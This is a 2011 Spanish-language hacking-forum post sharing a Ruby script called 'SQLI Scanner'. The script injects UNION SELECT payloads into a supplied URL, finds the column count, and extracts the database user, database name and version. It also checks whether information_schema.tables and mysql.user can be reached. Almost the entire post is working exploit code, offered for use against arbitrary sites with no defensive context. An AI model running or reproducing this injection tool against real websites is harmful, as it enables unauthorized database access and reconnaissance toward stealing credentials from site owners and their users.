Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: BigBear en 7 Octubre 2011, 01:32 am


Título: [Ruby] SQLI Scanner
Publicado por: BigBear en 7 Octubre 2011, 01:32 am
Un scanner de SQLI en ruby

Código
  1. #!usr/bin/ruby
  2. #SQLI Scannerl (C) Doddy Hackman 2010 
  3. #contact me : doddy-hackman.blogspot.com
  4.  
  5. require 'net/http'
  6.  
  7.  
  8. def uso
  9.   print "\n[+] sqli.rb <site>\n"
  10. end
  11.  
  12. def toma(host,path)
  13.   http = Net::HTTP.new(host,80)
  14.   return http.get(path).body
  15. end
  16.  
  17. def details(web,more) 
  18. web1 = more.sub(/hackman/,"0x4b30425241")
  19. more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  20. print "\n\n[+] Extrating information of the DB\n\n"
  21. url = URI.parse(web)
  22. code = toma(url.host,url.path+"?"+url.query+more)
  23. if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
  24.   print "[username] : "+$1+"\n"
  25.   print "[database] : "+$2+"\n"
  26.   print "[version] : "+$3+"\n\n"
  27.  
  28. test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
  29. test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")
  30.  
  31. if test1=~/K0BRA/
  32.   print "[information_schema.tables] : ON\n"
  33. end
  34.  
  35. if test2=~/K0BRA/
  36.  print "[mysql.user] : ON"
  37. end
  38.  
  39.  
  40. else 
  41.   print "\n[-] Not Found\n\n"
  42. end
  43. end
  44.  
  45.  
  46. def scan(web)
  47. print "\n[+] Testing the vulnerability SQLI...\n\n"
  48. url = URI.parse(web)
  49. codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
  50. if codetest=~/The used SELECT statements have a different number of columns/
  51.   print "[+] SQLI Detected\n\n"
  52.   else
  53.   print "[-] Not Vulnerable to SQLI\n\n"
  54.   copyright()
  55. end
  56.  
  57. z = "1"
  58. x = "concat(0x4b30425241,1,0x4b30425241)"
  59. for num in ('2'..'25')
  60. z = z+","+num
  61. x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  62. #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
  63. code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
  64. if code=~/K0BRA(.*?)K0BRA/
  65. print "[+] The Page has "+num+" columns\n"
  66. print "[+] The number "+$1+" print data\n\n"
  67. z = z.sub($1,"hackman")
  68. print "[SQLI] : "+web+"-1+union+select+"+z
  69. details(web,"-1+union+select+"+z)
  70. copyright()
  71. end
  72. end
  73. print "\n\n[-] Not Found the numbers of the columns\n\n"
  74. copyright()
  75. end
  76.  
  77. def head() 
  78.   print "\n\n -- == SQLI Scanner == --\n\n"
  79. end
  80.  
  81. def copyright() 
  82.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
  83.    exit(1)
  84.  end
  85.  
  86. head()
  87. if !ARGV[0] 
  88.   uso()
  89. else 
  90.   scan(ARGV[0]) 
  91.   copyright()  
  92. end
  93. copyright()
  94.  


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines